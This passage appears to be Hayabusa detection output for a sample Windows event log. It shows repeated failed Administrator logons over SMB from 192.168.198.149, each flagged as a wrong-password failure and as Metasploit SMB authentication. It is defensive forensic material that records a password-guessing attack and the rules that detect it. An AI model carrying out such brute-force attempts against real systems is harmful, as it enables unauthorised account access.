Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
